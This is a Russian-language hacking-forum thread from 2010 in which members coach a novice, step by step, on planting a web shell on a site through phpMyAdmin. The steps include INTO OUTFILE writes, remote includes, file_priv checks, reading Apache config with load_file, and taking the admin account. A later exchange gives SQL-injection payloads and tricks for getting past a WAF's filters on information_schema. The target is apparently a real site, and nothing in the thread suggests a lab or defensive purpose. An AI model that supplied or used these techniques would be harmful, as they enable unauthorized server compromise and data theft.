ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.10.2010, 03:11
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от KENT1994
KENT1994 said:
что за шляпа???шелл литься не хочет
p.s какие есть способы залития шелла в phpmyadmin?????
и что можно сделать имея доступ в phpmyadmin?
CREATE DATABASE `shell_upload`;
CREATE TABLE `hack` (`shell` TEXT);
INSERT INTO `hack` (`shell`) VALUES ('');
Ищем папку с правами на запись и делаем запрос
SELECT `shell` FROM `hack` INTO OUTFILE '/path/shell.php';
Либо можно инклудить шелл с сервера.
INSERT INTO `hack` (`shell`) VALUES ("");
Для этого способа, директива allow_url_include должна находиться в положении On.
|
|
|
15.10.2010, 03:32
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674
Репутация:
65
|
|
Сообщение от None
Для этого способа, директива allow_url_include должна находиться в положении On
где ее найти?? и можно ли ее включить?
|
|
|
|
15.10.2010, 03:44
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от KENT1994
KENT1994 said:
где ее найти??
и можно ли ее включить?
Найти ее можно вызвав phpinfo или посмотреть в файле php.ini
А чем тебя первый способ не устроил?
|
|
|
|
15.10.2010, 03:48
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674
Репутация:
65
|
|
вроде залил , но теперь хз где искать
сделал так ---> INSERT INTO `hack` (`shell`) VALUES ("");
где теперь найти на сайте этот шелл(
|
|
|
|
15.10.2010, 03:54
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от KENT1994
KENT1994 said:
вроде залил , но теперь хз где
искать
сделал так ---> INSERT INTO `hack` (`shell`) VALUES ("");
где теперь найти на сайте этот шелл(
Когда льешь через into outfile, ты должен указать абсолютный путь до папки с правами на запись, там и ищи.
Лучше лей через eval, так как allow_url_include, достаточно редко бывает в положении On.
|
|
|
|
15.10.2010, 04:01
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674
Репутация:
65
|
|
SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так?
я просто хз как найти папку для залива файлов шел во 2й раз заливаю
|
|
|
|
15.10.2010, 04:13
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от KENT1994
KENT1994 said:
SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так?
Ну я не знаю какой у тебя путь, это тебе виднее. Если ты это прописал рандомом, то вероятно не так.
А если ты прочитал конфиги через load_file или нашел раскрытие путей, то так.
У тебя вообще права есть на чтение и запись файлов?
Что то я уже начал сомневаться, судя по ошибке, что ты выложил, а потом удалил.
Сделай запрос в phpmyadmin
Код HTML:
HTML:
SELECT user() FROM mysql.user
выдаст тебе юзера, под которым работает БД
Потом сделай запрос
Код HTML:
HTML:
SELECT file_priv FROM mysql.user WHERE user = 'имя юзера'
Если получишь Y, значит права есть. Следовательно, ты можешь читать файлы через load_file() и писать в них, дальше попробуй прочитать конфиги сервера.
Код HTML:
HTML:
SELECT load_file('/etc/apache2/httpd.conf')
и тд, там ты найдешь путь.
Стандартные пути для файлов конфигурации, ты можешь найти по ссылке /thread49775-Default.html
Либо ищи раскрытие путей.
Некоторые варианты, как это можно сделать описаны мной вот тут /showpost.php?p=2324984&postcount=4
Какая вообще твоя цель? Шелл залить? Ты можешь достать из базы акк админа и попробывать залить через админку. Как это сделать обсуждалось выше.
|
|
|
|
15.10.2010, 04:33
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674
Репутация:
65
|
|
сенкс за урок, после техникума домучаюсь
|
|
|
|
15.10.2010, 07:01
|
|
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486
Репутация:
0
|
|
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.
union(SELECT+1,version(),3,4,5) так работает.
Посоветуйте что-либо плиз.
Спасибо.
|
|
|
|
15.10.2010, 09:35
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Попробуй:
1 - /*!запрос*/
2 - использовать метод POST
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
